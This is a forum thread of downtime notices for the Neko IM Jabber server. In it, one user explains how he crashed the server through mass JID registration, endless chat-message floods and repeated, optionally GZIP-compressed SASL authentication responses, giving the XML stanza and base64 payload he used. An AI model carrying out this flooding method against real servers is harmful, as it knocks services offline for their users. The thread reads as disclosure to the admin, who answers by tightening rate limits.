Downtimes

Downtimes

Postby Nulani » Tue Aug 16, 2011 12:35 pm

Still struggling with massive floods. I'll hopefully have a fix relatively soon, until then, please bare with me.
Evil is good.
Evil!
User avatar
Nulani
Site Admin
 
Posts: 255
Joined: Wed May 23, 2007 9:42 pm
Location: Norway

Re: Downtimes

Postby Ola-la~ » Fri Aug 26, 2011 6:45 am

Good day and first of all sorry for my terrible English, my native language is Russian, and I'm using Google Translate.
In the second, I want to apologize for a series of crashes server neko.im. I did not expect that the server is so vulnerable to wipe some JID's.
If you need information to address security vulnerabilities, I am ready to provide assistance.
I really like your server and I'm sorry about what happened. I also sent this to your e-mail.
User avatar
Ola-la~
 
Posts: 2
Joined: Fri Aug 26, 2011 3:52 am

Re: Downtimes

Postby Nulani » Fri Aug 26, 2011 9:18 pm

It seems to be a weakness in my setup of Prosody. It should not be that easy to crash. Thank you for the apology and for letting me know. Google Translate: Казалось бы, слабость в моей установке стихосложения. Оно не должно быть так просто к краху. Спасибо за извинения и сообщили мне об этом.

Developer was wondering what you meant with 'wipe some JID's.' Could you describe what you mean with it exactly? Google Translate: Разработчик было интересно, что вы имели в виду с "уничтожили какую-то JID в. Не могли бы вы описать, что вы имеете в виду именно с ним?
Evil is good.
Evil!
User avatar
Nulani
Site Admin
 
Posts: 255
Joined: Wed May 23, 2007 9:42 pm
Location: Norway

Re: Downtimes

Postby Ola-la~ » Sat Aug 27, 2011 2:27 am

The attack consists of:
    1) Registration of a large number of JID's on different jabber servers (decentralized network helps that).
    2) Sending Presence (login) for the jabber servers
    3) Sending an infinite loop following xml template from my bots to the recipient:
Code: Select all
<message type="chat" to="recipient"
   id="messageid"
   from="myid">
   <body>Random generated text</body>
</message>

Just receiving a lot of messages from other servers is very strongly loads the server.
Also, I use a DDoS, based on queries to the server. Approximately:
Code: Select all
<response xmlns='urn:ietf:params:xml:ns:xmpp-sasl'>
dXNlcm5hbWU9ImRlbHBoaS10ZXN0IixyZWFsbT0iamFiYmVyLnJ1Iixub25jZT0iMjI2ND
c3NDgiLGNub25jZT0iMjMxM2UwNjk2NDlkYWEwY2EyYjc2MzYzNTI1MDU5ZWJkIixu
Yz0wMDAwMDAwMSxxb3A9YXV0aCxkaWdlc3QtdXJpPSJ4bXBwL2phYmJlci5ydSIsY2
hhcnNldD11dGYtOCxyZXNwb25zZT0xNjM1MWY4NmNjNTU5MTMxMmUyMGI0Y2Nk
ODgwZWFkYg==
</response>

Also, submitted queries can be GZIP-compressed, in this case the server crashes in 10 minutes.

ImageImage

Once again I want to apologize, I used the DDoS and wipe to deal with very bad people who use your server.
User avatar
Ola-la~
 
Posts: 2
Joined: Fri Aug 26, 2011 3:52 am

Re: Downtimes

Postby Orange » Mon Sep 05, 2011 1:12 pm

>I used the DDoS and wipe to deal with very bad people who use your server.
>very bad people
>Olanet
Lol, a lot of guys that wipe conferences without discrimination.
Orange
 
Posts: 1
Joined: Mon Aug 01, 2011 8:03 pm

Re: Downtimes

Postby Nulani » Thu Dec 15, 2011 2:15 am

Sorry about the downtime. One of my users is being flooded, which, well, overloads Prosody.
Evil is good.
Evil!
User avatar
Nulani
Site Admin
 
Posts: 255
Joined: Wed May 23, 2007 9:42 pm
Location: Norway

Re: Downtimes

Postby Nulani » Thu Dec 15, 2011 9:20 pm

Experimenting some. Sorry about any downtime.
Evil is good.
Evil!
User avatar
Nulani
Site Admin
 
Posts: 255
Joined: Wed May 23, 2007 9:42 pm
Location: Norway

Re: Downtimes

Postby Nulani » Mon Jan 02, 2012 11:36 am

Sorry about the downtime today. Present from our resident flooders.
Evil is good.
Evil!
User avatar
Nulani
Site Admin
 
Posts: 255
Joined: Wed May 23, 2007 9:42 pm
Location: Norway

Re: Downtimes

Postby Nulani » Thu Jan 26, 2012 9:36 pm

26-01-2012:
Firewall upgrade and reboot. Sorry about the lack of warning.
Evil is good.
Evil!
User avatar
Nulani
Site Admin
 
Posts: 255
Joined: Wed May 23, 2007 9:42 pm
Location: Norway

Re: Downtimes

Postby Nulani » Sat Oct 13, 2012 3:22 pm

13-10-12
Nyaknyak flood. It is still ongoing.

Edit: I'm now running mod_limits with pretty aggressive settings. Please let me know if this causes any unforeseen issues.
Evil is good.
Evil!
User avatar
Nulani
Site Admin
 
Posts: 255
Joined: Wed May 23, 2007 9:42 pm
Location: Norway

Next

Return to Neko IM!

Who is online

Users browsing this forum: No registered users and 1 guest

cron